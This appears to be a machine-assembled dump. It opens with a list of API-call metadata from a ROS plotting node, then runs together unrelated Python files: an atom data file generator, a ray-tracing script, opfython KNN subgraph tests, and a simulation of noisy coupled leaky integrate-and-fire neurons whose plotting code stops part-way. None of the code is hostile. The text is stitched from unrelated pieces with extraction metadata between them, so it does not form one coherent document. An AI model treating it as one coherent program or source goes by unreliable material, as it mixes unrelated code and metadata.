[((822, 860), 'roslib.load_manifest', 'roslib.load_manifest', (['"""dse_simulation"""'], {}), "('dse_simulation')\n", (842, 860), False, 'import roslib\n'), ((6055, 6107), 'rospy.init_node', 'rospy.init_node', (['"""dse_plotting_node"""'], {'anonymous': '(True)'}), "('dse_plotting_node', anonymous=True)\n", (6070, 6107), False, 'import rospy\n'), ((1681, 1708), 'rospy.get_param', 'rospy.get_param', (['"""~objects"""'], {}), "('~objects')\n", (1696, 1708), False, 'import rospy\n'), ((1735, 1765), 'rospy.get_param', 'rospy.get_param', (['"""~object_ids"""'], {}), "('~object_ids')\n", (1750, 1765), False, 'import rospy\n'), ((1791, 1820), 'rospy.get_param', 'rospy.get_param', (['"""~agent_ids"""'], {}), "('~agent_ids')\n", (1806, 1820), False, 'import rospy\n'), ((1846, 1878), 'rospy.get_param', 'rospy.get_param', (['"""~dim_state"""', '(6)'], {}), "('~dim_state', 6)\n", (1861, 1878), False, 'import rospy\n'), ((1949, 2003), 'rospy.Subscriber', 'rospy.Subscriber', (['"""/store_data"""', 'Bool', 'self.store_data'], {}), "('/store_data', Bool, self.store_data)\n", (1965, 2003), False, 'import rospy\n'), ((2040, 2081), 'gazebo_lib.GazeboModel', 'gazebo_lib.GazeboModel', (['self.object_names'], {}), '(self.object_names)\n', (2062, 2081), False, 'import gazebo_lib\n'), ((3104, 3122), 'numpy.array', 'np.array', (['data.ids'], {}), '(data.ids)\n', (3112, 3122), True, 'import numpy as np\n'), ((3139, 3185), 'dse_lib.multi_array_2d_output', 'dse_lib.multi_array_2d_output', (['data.inf_matrix'], {}), '(data.inf_matrix)\n', (3168, 3185), False, 'import dse_lib\n'), ((3202, 3248), 'dse_lib.multi_array_2d_output', 'dse_lib.multi_array_2d_output', (['data.inf_vector'], {}), '(data.inf_vector)\n', (3231, 3248), False, 'import dse_lib\n'), ((3318, 3338), 'numpy.linalg.inv', 'np.linalg.inv', (['inf_Y'], {}), '(inf_Y)\n', (3331, 3338), True, 'import numpy as np\n'), ((6156, 6168), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (6166, 6168), False, 'import rospy\n'), ((3702, 3753), 'dse_lib.pose_from_state_3D', 'dse_lib.pose_from_state_3D', (['self.inf_x[i_min:i_max]'], {}), '(self.inf_x[i_min:i_max])\n', (3728, 3753), False, 'import dse_lib\n'), ((3987, 4045), 'dse_lib.sub_matrix', 'dse_lib.sub_matrix', (['inf_P', 'inf_id_list', 'id', 'self.dim_state'], {}), '(inf_P, inf_id_list, id, self.dim_state)\n', (4005, 4045), False, 'import dse_lib\n'), ((4064, 4107), 'dse_lib.state_cov_to_covariance_matrix', 'dse_lib.state_cov_to_covariance_matrix', (['cov'], {}), '(cov)\n', (4102, 4107), False, 'import dse_lib\n'), ((4852, 4871), 'numpy.array', 'np.array', (['true_pose'], {}), '(true_pose)\n', (4860, 4871), True, 'import numpy as np\n'), ((4916, 4934), 'numpy.array', 'np.array', (['est_pose'], {}), '(est_pose)\n', (4924, 4934), True, 'import numpy as np\n'), ((2491, 2597), 'rospy.Subscriber', 'rospy.Subscriber', (["(self.agent_names[i] + '/dse/inf/results')", 'InfFilterResults', 'self.results_callback', 'i'], {}), "(self.agent_names[i] + '/dse/inf/results', InfFilterResults,\n self.results_callback, i)\n", (2507, 2597), False, 'import rospy\n'), ((2919, 2977), 'rospy.signal_shutdown', 'rospy.signal_shutdown', (['"""invalid state dimension passed in"""'], {}), "('invalid state dimension passed in')\n", (2940, 2977), False, 'import rospy\n'), ((3270, 3290), 'numpy.linalg.inv', 'np.linalg.inv', (['inf_Y'], {}), '(inf_Y)\n', (3283, 3290), True, 'import numpy as np\n'), ((3801, 3838), 'dse_lib.state_from_pose_3D', 'dse_lib.state_from_pose_3D', (['this_pose'], {}), '(this_pose)\n', (3827, 3838), False, 'import dse_lib\n'), ((4264, 4301), 'dse_lib.state_from_pose_3D', 'dse_lib.state_from_pose_3D', (['this_pose'], {}), '(this_pose)\n', (4290, 4301), False, 'import dse_lib\n'), ((4704, 4720), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (4718, 4720), False, 'import rospy\n'), ((3561, 3588), 'numpy.where', 'np.where', (['(inf_id_list == id)'], {}), '(inf_id_list == id)\n', (3569, 3588), True, 'import numpy as np\n'), ((4728, 4744), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (4742, 4744), False, 'import rospy\n'), ((5343, 5365), 'numpy.array', 'np.array', (['self.time[i]'], {}), '(self.time[i])\n', (5351, 5365), True, 'import numpy as np\n'), ((5404, 5432), 'numpy.array', 'np.array', (['self.true_poses[i]'], {}), '(self.true_poses[i])\n', (5412, 5432), True, 'import numpy as np\n'), ((5470, 5497), 'numpy.array', 'np.array', (['self.est_poses[i]'], {}), '(self.est_poses[i])\n', (5478, 5497), True, 'import numpy as np\n'), ((5541, 5574), 'numpy.array', 'np.array', (['self.est_covariances[i]'], {}), '(self.est_covariances[i])\n', (5549, 5574), True, 'import numpy as np\n'), ((5987, 6023), 'os.path.join', 'os.path.join', (['sys.path[0]', 'dump_file'], {}), '(sys.path[0], dump_file)\n', (5999, 6023), False, 'import os\n'), ((4410, 4428), 'numpy.array', 'np.array', (['est_pose'], {}), '(est_pose)\n', (4418, 4428), True, 'import numpy as np\n'), ((5928, 5944), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (5942, 5944), False, 'import rospy\n')]
|
import numpy as np
class Atom:
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
self.type = 1
self.vx = 0.0
self.vy = 0.0
self.vz = 0.0
def save_file(filename, atoms, lo, hi):
with open(filename, "w") as f:
f.write("Position Data\n\n")
f.write("{} atoms\n".format(len(atoms)))
f.write("1 atom types\n\n")
f.write(f"{lo} {hi} xlo xhi\n")
f.write(f"{lo} {hi} ylo yhi\n")
f.write(f"{lo} {hi} zlo zhi\n")
f.write("\n")
f.write("Atoms\n\n")
for i, a in enumerate(atoms):
f.write("{} {} {} {} {}\n".format(i+1, a.type, a.x, a.y, a.z))
f.write("\n")
f.write("Velocities\n\n")
for i, a in enumerate(atoms):
f.write("{} {} {} {}\n".format(i+1, a.vx, a.vy, a.vz))
print("Generated {}".format(filename))
if __name__ == "__main__":
lo = -10
hi = 30
atoms = []
for x in np.arange(lo, hi, 1):
atoms.append(Atom(x, 0, 0))
save_file("test.atoms", atoms, lo, hi)
|
[
"numpy.arange"
] |
[((1017, 1037), 'numpy.arange', 'np.arange', (['lo', 'hi', '(1)'], {}), '(lo, hi, 1)\n', (1026, 1037), True, 'import numpy as np\n')]
|
import numpy as np
import matplotlib.pyplot as plt
from glsl_helpers import *
degtorad = lambda a: a / 180.0 * np.pi
def smooth_step(x, threshold, steepness):
return 1.0 / (1.0 + exp(-(x - threshold) * steepness))
def trace_u(pos, ray, path):
n_steps = path.shape[0]
u0 = 1.0 / length(pos)
u = u0
normal_vec = normalize(pos)
tangent_vec = normalize(cross(cross(normal_vec, ray), normal_vec))
du = -dot(ray, normal_vec) / dot(ray, tangent_vec) * u
du0 = du
theta = 0
t = 0
ddu = 0
MAX_REVOLUTIONS = 2
theta_step = 2.0 * M_PI * MAX_REVOLUTIONS / float(n_steps)
for j in range(n_steps):
max_rel_u_change = (1 - log(u)) * 10.0 / float(n_steps)
step = theta_step
if (du > 0 or (du0 < 0.0 and u0 / u < 5.0)) and abs(du) > abs(max_rel_u_change * u) / theta_step:
step = max_rel_u_change * u / abs(du)
path[j, 0:3] = pos
path[j, 3] = t
u += du * step
ddu = -u * (1.0 - 1.5 * u * u)
du += ddu * step
if u < 0.0: break
if u < 1.0: dt = sqrt(du * du + u * u * (1.0 - u)) / (u * u * (1.0 - u)) * step
theta += step
old_pos = pos
pos = (cos(theta) * normal_vec + sin(theta) * tangent_vec) / u
if u > 1.0: break
mix = smooth_step(1.0 / u, 8.0, 2.0)
dt = mix * length(pos - old_pos) + (1.0 - mix) * dt
t += dt
def path_r(path):
return np.sqrt(np.sum(path[:, 0:3] * path[:, 0:3], 1))
def path_x(path): return path[:, 0]
def path_y(path): return path[:, 1]
def path_time(path): return path[:, 3]
def path_arc_length(path):
return np.hstack(([0], np.cumsum(path_r(path[1:] - path[:-1]))))
def path_angle(path):
angles = np.zeros(path[:, 0].shape) + np.nan
diffs = path[1:] - path[:-1]
angles[:-1] = np.arctan2(diffs[:, 1], diffs[:, 0])
return angles
def get_first_non_nas(array):
nas = np.where(np.logical_not(np.isfinite(array)))[0]
if nas.size == 0 or nas[0] == 0: return array
return array[:nas[0]]
def last_cont_non_na(array):
array = get_first_non_nas(array)
if array.size == 0: return np.nan
return array[-1]
def crossing_func(path, x_func, y_func, threshold):
x = get_first_non_nas(x_func(path))
y = get_first_non_nas(y_func(path))
if x.size < 2 or y.size < 2: return np.nan
ins = np.where(y < threshold)[0]
if ins.size == 0 or ins[0] == 0: return np.nan
i1 = ins[0]
i0 = i1 - 1
return np.interp(threshold, [y[i1], y[i0]], [x[i1], x[i0]])
def ball_entry_time(path, radius):
return crossing_func(path, path_time, path_r, radius)
def ball_entry_dist(path, radius):
return crossing_func(path, path_arc_length, path_r, radius)
def last_angle(path):
return last_cont_non_na(path_angle(path))
def deflection_angle(path):
if last_cont_non_na(path_r(path)) < 2.0: return np.nan
return last_angle(path) - path_angle(path)[0]
class PlotParams:
def __init__(self, **kwargs):
self.solver_func = trace_u
self.n_steps = 500
self.angle = 30
self.x0 = -4
self.plot = True
self.plot_scale = 5
self.plot_xlim = None
self.plot_ylim = None
self.plot_x = path_x
self.plot_y = path_y
self.plot_args = {}
def set_params(self, **kwargs):
for param, value in kwargs.items():
setattr(self, param, value)
def trace_ray(ray=None, **kwargs):
if ray is None: ray = PlotParams()
ray.set_params(**kwargs)
path = np.zeros((ray.n_steps, 4)) + np.nan
a = degtorad(ray.angle)
pos0 = (ray.x0, 0, 0)
ray_dir = (np.cos(a), np.sin(a), 0)
pos = np.ravel(pos0).T * 1.0
ray_dir = np.ravel(ray_dir).T * 1.0
ray.solver_func(pos, ray_dir, path)
if ray.plot is True:
plt.plot(ray.plot_x(path), ray.plot_y(path), **ray.plot_args)
if ray.plot_scale is not None:
plt.xlim([-ray.plot_scale, ray.plot_scale])
plt.ylim([-ray.plot_scale, ray.plot_scale])
if ray.plot_xlim is not None: plt.xlim(ray.plot_xlim)
if ray.plot_ylim is not None: plt.ylim(ray.plot_ylim)
return path
def trace_rays(n_rays=1, **kwargs):
agg_xy = np.zeros((n_rays, 2)) + np.nan
for j in range(n_rays):
ray = PlotParams()
ray.aggregate_plot_x = None
ray.set_params(**kwargs)
ray.idx = j
ray.rel = (j + 1) / float(n_rays)
yield (ray)
path = trace_ray(ray)
if ray.aggregate_plot_x is not None:
agg_xy[j, 0] = ray.aggregate_plot_x(path)
agg_xy[j, 1] = ray.aggregate_plot_y(path)
if ray.aggregate_plot_x is not None:
if ray.plot is True: plt.show()
plt.plot(agg_xy[:, 0], agg_xy[:, 1])
#trace_rays()
|
[
"matplotlib.pyplot.xlim",
"numpy.arctan2",
"numpy.sum",
"matplotlib.pyplot.plot",
"numpy.ravel",
"matplotlib.pyplot.ylim",
"matplotlib.pyplot.show",
"numpy.zeros",
"numpy.isfinite",
"numpy.where",
"numpy.sin",
"numpy.cos",
"numpy.interp"
] |
[((1837, 1873), 'numpy.arctan2', 'np.arctan2', (['diffs[:, 1]', 'diffs[:, 0]'], {}), '(diffs[:, 1], diffs[:, 0])\n', (1847, 1873), True, 'import numpy as np\n'), ((2498, 2550), 'numpy.interp', 'np.interp', (['threshold', '[y[i1], y[i0]]', '[x[i1], x[i0]]'], {}), '(threshold, [y[i1], y[i0]], [x[i1], x[i0]])\n', (2507, 2550), True, 'import numpy as np\n'), ((1458, 1496), 'numpy.sum', 'np.sum', (['(path[:, 0:3] * path[:, 0:3])', '(1)'], {}), '(path[:, 0:3] * path[:, 0:3], 1)\n', (1464, 1496), True, 'import numpy as np\n'), ((1750, 1776), 'numpy.zeros', 'np.zeros', (['path[:, 0].shape'], {}), '(path[:, 0].shape)\n', (1758, 1776), True, 'import numpy as np\n'), ((2377, 2400), 'numpy.where', 'np.where', (['(y < threshold)'], {}), '(y < threshold)\n', (2385, 2400), True, 'import numpy as np\n'), ((3554, 3580), 'numpy.zeros', 'np.zeros', (['(ray.n_steps, 4)'], {}), '((ray.n_steps, 4))\n', (3562, 3580), True, 'import numpy as np\n'), ((3660, 3669), 'numpy.cos', 'np.cos', (['a'], {}), '(a)\n', (3666, 3669), True, 'import numpy as np\n'), ((3671, 3680), 'numpy.sin', 'np.sin', (['a'], {}), '(a)\n', (3677, 3680), True, 'import numpy as np\n'), ((4240, 4261), 'numpy.zeros', 'np.zeros', (['(n_rays, 2)'], {}), '((n_rays, 2))\n', (4248, 4261), True, 'import numpy as np\n'), ((4752, 4788), 'matplotlib.pyplot.plot', 'plt.plot', (['agg_xy[:, 0]', 'agg_xy[:, 1]'], {}), '(agg_xy[:, 0], agg_xy[:, 1])\n', (4760, 4788), True, 'import matplotlib.pyplot as plt\n'), ((3696, 3710), 'numpy.ravel', 'np.ravel', (['pos0'], {}), '(pos0)\n', (3704, 3710), True, 'import numpy as np\n'), ((3733, 3750), 'numpy.ravel', 'np.ravel', (['ray_dir'], {}), '(ray_dir)\n', (3741, 3750), True, 'import numpy as np\n'), ((3948, 3991), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[-ray.plot_scale, ray.plot_scale]'], {}), '([-ray.plot_scale, ray.plot_scale])\n', (3956, 3991), True, 'import matplotlib.pyplot as plt\n'), ((4004, 4047), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[-ray.plot_scale, ray.plot_scale]'], {}), '([-ray.plot_scale, ray.plot_scale])\n', (4012, 4047), True, 'import matplotlib.pyplot as plt\n'), ((4086, 4109), 'matplotlib.pyplot.xlim', 'plt.xlim', (['ray.plot_xlim'], {}), '(ray.plot_xlim)\n', (4094, 4109), True, 'import matplotlib.pyplot as plt\n'), ((4148, 4171), 'matplotlib.pyplot.ylim', 'plt.ylim', (['ray.plot_ylim'], {}), '(ray.plot_ylim)\n', (4156, 4171), True, 'import matplotlib.pyplot as plt\n'), ((4733, 4743), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4741, 4743), True, 'import matplotlib.pyplot as plt\n'), ((1958, 1976), 'numpy.isfinite', 'np.isfinite', (['array'], {}), '(array)\n', (1969, 1976), True, 'import numpy as np\n')]
|
import numpy as np
from opfython.math import distance
from opfython.stream import loader, parser
from opfython.subgraphs import knn
csv = loader.load_csv('data/boat.csv')
X, Y = parser.parse_loader(csv)
def test_knn_subgraph_n_clusters():
subgraph = knn.KNNSubgraph(X, Y)
assert subgraph.n_clusters == 0
def test_knn_subgraph_n_clusters_setter():
subgraph = knn.KNNSubgraph(X, Y)
try:
subgraph.n_clusters = 0.5
except:
subgraph.n_clusters = 1
assert subgraph.n_clusters == 1
try:
subgraph.n_clusters = -1
except:
subgraph.n_clusters = 1
assert subgraph.n_clusters == 1
def test_knn_subgraph_best_k():
subgraph = knn.KNNSubgraph(X, Y)
assert subgraph.best_k == 0
def test_knn_subgraph_best_k_setter():
subgraph = knn.KNNSubgraph(X, Y)
try:
subgraph.best_k = 0.5
except:
subgraph.best_k = 1
assert subgraph.best_k == 1
try:
subgraph.best_k = -1
except:
subgraph.best_k = 1
assert subgraph.best_k == 1
def test_knn_subgraph_constant():
subgraph = knn.KNNSubgraph(X, Y)
assert subgraph.constant == 0.0
def test_knn_subgraph_constant_setter():
subgraph = knn.KNNSubgraph(X, Y)
try:
subgraph.constant = 'a'
except:
subgraph.constant = 2.5
assert subgraph.constant == 2.5
def test_knn_subgraph_density():
subgraph = knn.KNNSubgraph(X, Y)
assert subgraph.density == 0.0
def test_knn_subgraph_density_setter():
subgraph = knn.KNNSubgraph(X, Y)
try:
subgraph.density = 'a'
except:
subgraph.density = 2.5
assert subgraph.density == 2.5
def test_knn_subgraph_min_density():
subgraph = knn.KNNSubgraph(X, Y)
assert subgraph.min_density == 0.0
def test_knn_subgraph_min_density_setter():
subgraph = knn.KNNSubgraph(X, Y)
try:
subgraph.min_density = 'a'
except:
subgraph.min_density = 2.5
assert subgraph.min_density == 2.5
def test_knn_subgraph_max_density():
subgraph = knn.KNNSubgraph(X, Y)
assert subgraph.max_density == 0.0
def test_knn_subgraph_max_density_setter():
subgraph = knn.KNNSubgraph(X, Y)
try:
subgraph.max_density = 'a'
except:
subgraph.max_density = 2.5
assert subgraph.max_density == 2.5
def test_knn_subgraph_calculate_pdf():
subgraph = knn.KNNSubgraph(X, Y)
distances = np.ones((100, 100))
subgraph.create_arcs(1, distance.euclidean_distance,
pre_computed_distance=True, pre_distances=distances)
subgraph.calculate_pdf(1, distance.euclidean_distance,
pre_computed_distance=True, pre_distances=distances)
subgraph.create_arcs(1, distance.euclidean_distance)
subgraph.calculate_pdf(1, distance.euclidean_distance)
assert subgraph.min_density != 0
assert subgraph.max_density != 0
def test_knn_subgraph_create_arcs():
subgraph = knn.KNNSubgraph(X, Y)
distances = np.ones((100, 100))
distances.fill(0.000001)
subgraph.create_arcs(1, distance.euclidean_distance,
pre_computed_distance=True, pre_distances=distances)
max_distances = subgraph.create_arcs(1, distance.euclidean_distance)
assert len(max_distances) == 1
def test_knn_subgraph_eliminate_maxima_height():
subgraph = knn.KNNSubgraph(X, Y)
subgraph.eliminate_maxima_height(2.5)
assert subgraph.nodes[0].cost == 0
|
[
"opfython.subgraphs.knn.KNNSubgraph",
"opfython.stream.parser.parse_loader",
"numpy.ones",
"opfython.stream.loader.load_csv"
] |
[((140, 172), 'opfython.stream.loader.load_csv', 'loader.load_csv', (['"""data/boat.csv"""'], {}), "('data/boat.csv')\n", (155, 172), False, 'from opfython.stream import loader, parser\n'), ((180, 204), 'opfython.stream.parser.parse_loader', 'parser.parse_loader', (['csv'], {}), '(csv)\n', (199, 204), False, 'from opfython.stream import loader, parser\n'), ((258, 279), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (273, 279), False, 'from opfython.subgraphs import knn\n'), ((377, 398), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (392, 398), False, 'from opfython.subgraphs import knn\n'), ((697, 718), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (712, 718), False, 'from opfython.subgraphs import knn\n'), ((808, 829), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (823, 829), False, 'from opfython.subgraphs import knn\n'), ((1110, 1131), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1125, 1131), False, 'from opfython.subgraphs import knn\n'), ((1227, 1248), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1242, 1248), False, 'from opfython.subgraphs import knn\n'), ((1422, 1443), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1437, 1443), False, 'from opfython.subgraphs import knn\n'), ((1537, 1558), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1552, 1558), False, 'from opfython.subgraphs import knn\n'), ((1733, 1754), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1748, 1754), False, 'from opfython.subgraphs import knn\n'), ((1856, 1877), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1871, 1877), False, 'from opfython.subgraphs import knn\n'), ((2064, 2085), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (2079, 2085), False, 'from opfython.subgraphs import knn\n'), ((2187, 2208), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (2202, 2208), False, 'from opfython.subgraphs import knn\n'), ((2397, 2418), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (2412, 2418), False, 'from opfython.subgraphs import knn\n'), ((2436, 2455), 'numpy.ones', 'np.ones', (['(100, 100)'], {}), '((100, 100))\n', (2443, 2455), True, 'import numpy as np\n'), ((2977, 2998), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (2992, 2998), False, 'from opfython.subgraphs import knn\n'), ((3016, 3035), 'numpy.ones', 'np.ones', (['(100, 100)'], {}), '((100, 100))\n', (3023, 3035), True, 'import numpy as np\n'), ((3378, 3399), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (3393, 3399), False, 'from opfython.subgraphs import knn\n')]
|
from matplotlib import cm, rcParams
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib as matplotlib
import numpy as np
import math as math
import random as rand
import os, sys, csv
import pandas as pd
#matplotlib.pyplot.xkcd(scale=.5, length=100, randomness=2)
c = ['#aa3863', '#d97020', '#ef9f07', '#449775', '#3b7d86', '#5443a3']
# red, orange, yellow, green, blue, purple
dW1, dW2, dW3 = 0, 0 ,0
np.random.seed() #42
def lif_euler(dt, v1, v2, I1, I2):
return [v1 + dt*(-v1 + gamma*(v2-v1) + I1) , v2 + dt*(-v2 + gamma*(v1-v2) + I2) ]
def lif_euler_stoch(dt, v1, v2, I1, I2, s1, s2, s3):
global dW1, dW2, dW3
dW1 = s1*math.sqrt(dt)*np.random.randn()
dW2 = s2*math.sqrt(dt)*np.random.randn()
dW3 = s3*math.sqrt(dt)*np.random.randn()
return [v1 + dt*(-v1 + gamma*(v2-v1) + I1) + dW1 + dW3, v2 + dt*(-v2 + gamma*(v1-v2) + I2) + dW2 + dW3]
def correlations(sigma1, sigma2, sigma3, nb_iterations=1000) :
phis = []
for k in range(nb_iterations) :
#v1_0, v2_0 = 0.7611728117817528, 0.1654125684129333 # Used XPPAUT to find ideal initial conditions s.t. we begin in antiphase with I = 1.4
v1_0, v2_0 = 0.3764002759711251, 0.8546679415731656
x1, x2 = [v1_0], [v2_0]
t = [0]
nb_spikes = 0
I_baseline = 1.5
I1, I2 = [I_baseline], [I_baseline]
pulse_start, pulse_duration = 0, 0.2
begin_pulse = True
while t[-1] < maxtime :
t.append(t[-1]+dt)
if nb_spikes == 10 and begin_pulse :
pulse_start = t[-1]
begin_pulse = False
if nb_spikes >= 10 and t[-1] < pulse_start + pulse_duration :
next_values= lif_euler_stoch(dt, x1[-1], x2[-1], I1[-1], I2[-1], sigma1, sigma2, sigma3)
I1.append(I_baseline + (dW1+dW3)/dt)
I2.append(I_baseline + (dW2+dW3)/dt)
else :
I1.append(I_baseline)
I2.append(I_baseline)
next_values = lif_euler(dt, x1[-1], x2[-1], I1[-1], I2[-1])
if next_values[0] > 1 :
x1.append(0)
nb_spikes += 1
if next_values[1] + gamma*beta > 1 :
x2.append(0)
else :
x2.append(next_values[1]+gamma*beta)
elif next_values[1] > 1 :
x2.append(0)
if next_values[0] + gamma*beta > 1 :
x1.append(0)
else :
x1.append(next_values[0]+gamma*beta)
else :
x1.append(next_values[0])
x2.append(next_values[1])
# Spike times
spike_times, k = [], 0
for i in range(1, len(t)) :
if abs(x1[i]-x1[i-1]) > (Vth-Vr)/2 and t[i] >= Dtime :
spike_times.append(t[i])
k = i
break
for i in range(k, len(t)) :
if abs(x2[i]-x2[i-1]) > (Vth-Vr)/2 :
spike_times.append(t[i])
k = i
break
for i in range(k, len(t)) :
if abs(x1[i+1]-x1[i]) > (Vth-Vr)/2 :
spike_times.append(t[i])
break
phis.append((spike_times[2] - spike_times[1])/(spike_times[2] - spike_times[0]))
"""
# Plot trials
fig, ax = plt.subplots(2, 1, figsize=(12,5), sharey='row')
ax[1].plot(t, x1, label='$V_{1}$', color='#aa3863')
ax[1].plot(t, x2, label='$V_{2}$', color='#3b7d86')
ax[0].plot(t, I1, label='$I_1$')
ax[0].plot(t, I2, label='$I_2$')
ax[0].legend(loc='upper right')
ax[1].legend(loc='upper right')
ax[0].set_title('Noisy input current trial, $\sigma=0.0025, I_{base}=1.5, \gamma=0.4, \\beta=0.1$')
#plt.savefig('trial_example_.png', dpi=600)
plt.show()
"""
phis = np.array(phis) % 1
print("phis ", phis)
return phis
gamma, beta = 0.4, 0.1
Vth, Vr = 1, 0
dt = 0.001
Dtime = 75
maxtime = 80
# CORRELATED
sigma_corr = [[0., 0., 0.1], [0., 0., 0.15], [0., 0., 0.2], [0., 0., 0.25], [0., 0., 0.3], [0., 0., 0.4]]
phis1_corr = correlations(sigma_corr[0][0], sigma_corr[0][1], sigma_corr[0][2])
phis2_corr = correlations(sigma_corr[1][0], sigma_corr[1][1], sigma_corr[1][2])
phis3_corr = correlations(sigma_corr[2][0], sigma_corr[2][1], sigma_corr[2][2])
phis4_corr = correlations(sigma_corr[3][0], sigma_corr[3][1], sigma_corr[3][2])
phis5_corr = correlations(sigma_corr[4][0], sigma_corr[4][1], sigma_corr[4][2])
phis6_corr = correlations(sigma_corr[5][0], sigma_corr[5][1], sigma_corr[5][2])
# Generate data on phase differences
phis1_corr = pd.Series(phis1_corr)
phis2_corr = pd.Series(phis2_corr)
phis3_corr = pd.Series(phis3_corr)
phis4_corr = pd.Series(phis4_corr)
phis5_corr = pd.Series(phis5_corr)
phi65_corr = pd.Series(phis6_corr)
# UNCORRELATED
sigma_uncorr = [[0.1, 0.1, 0.], [0.15, 0.15, 0.], [0.2, 0.2, 0.], [0.25, 0.25, 0.], [0.3, 0.3, 0.], [0.4, 0.4, 0.]]
phis1_uncorr = correlations(sigma_uncorr[0][0], sigma_uncorr[0][1], sigma_uncorr[0][2])
phis2_uncorr = correlations(sigma_uncorr[1][0], sigma_uncorr[1][1], sigma_uncorr[1][2])
phis3_uncorr = correlations(sigma_uncorr[2][0], sigma_uncorr[2][1], sigma_uncorr[2][2])
phis4_uncorr = correlations(sigma_uncorr[3][0], sigma_uncorr[3][1], sigma_uncorr[3][2])
phis5_uncorr = correlations(sigma_uncorr[4][0], sigma_uncorr[4][1], sigma_uncorr[4][2])
phis6_uncorr = correlations(sigma_uncorr[5][0], sigma_uncorr[5][1], sigma_uncorr[5][2])
# Generate data on phase differences
phis1_uncorr = pd.Series(phis1_uncorr)
phis2_uncorr = pd.Series(phis2_uncorr)
phis3_uncorr = pd.Series(phis3_uncorr)
phis4_uncorr = pd.Series(phis4_uncorr)
phis5_uncorr = pd.Series(phis5_uncorr)
phi65_uncorr = pd.Series(phis6_uncorr)
fig, ax = plt.subplots(2, 3, figsize=(10, 5), sharex='col', sharey='row')
plt.ylim(0, 1000)
fig.suptitle('Distribution of phase difference, correlated vs uncorrelated')
ax[1, 0].set_xlabel('Phase Difference $\phi$')
ax[1, 1].set_xlabel('Phase Difference $\phi$')
ax[1, 2].set_xlabel('Phase Difference $\phi$')
ax[0, 0].set_ylabel(f'$\phi$ (t={Dtime})')
ax[1, 0].set_ylabel(f'$\phi$ (t={Dtime})')
ax[0, 0].set_ylim(0, 1000)
ax[1, 0].set_ylim(0, 1000)
text_plot1 = f'$\sigma_1$={sigma_uncorr[0][0]}, $\sigma_2$={sigma_uncorr[0][1]} and $\sigma_3$={sigma_corr[0][2]}.'
ax[0, 0].hist(phis1_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated')
ax[0, 0].hist(phis1_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated')
ax[0, 0].legend(loc='upper right', prop={'size': 8})
ax[0, 0].set_title(text_plot1, size=10)
text_plot2 = f'$\sigma_1$={sigma_uncorr[1][0]}, $\sigma_2$={sigma_uncorr[1][1]} and $\sigma_3$={sigma_corr[1][2]}.'
ax[0, 1].hist(phis2_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated')
ax[0, 1].hist(phis2_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated')
ax[0, 1].legend(loc='upper right', prop={'size': 8})
ax[0, 1].set_title(text_plot2, size=10)
text_plot3 = f'$\sigma_1$={sigma_uncorr[2][0]}, $\sigma_2$={sigma_uncorr[2][1]} and $\sigma_3$={sigma_corr[2][2]}.'
ax[0, 2].hist(phis3_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated')
ax[0, 2].hist(phis3_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated')
ax[0, 2].legend(loc='upper right', prop={'size': 8})
ax[0, 2].set_title(text_plot3, size=10)
text_plot4 = f'$\sigma_1$={sigma_uncorr[3][0]}, $\sigma_2$={sigma_uncorr[3][1]} and $\sigma_3$={sigma_corr[3][2]}.'
ax[1, 0].hist(phis4_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated')
ax[1, 0].hist(phis4_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated')
ax[1, 0].legend(loc='upper right', prop={'size': 8})
ax[1, 0].set_title(text_plot4, size=10)
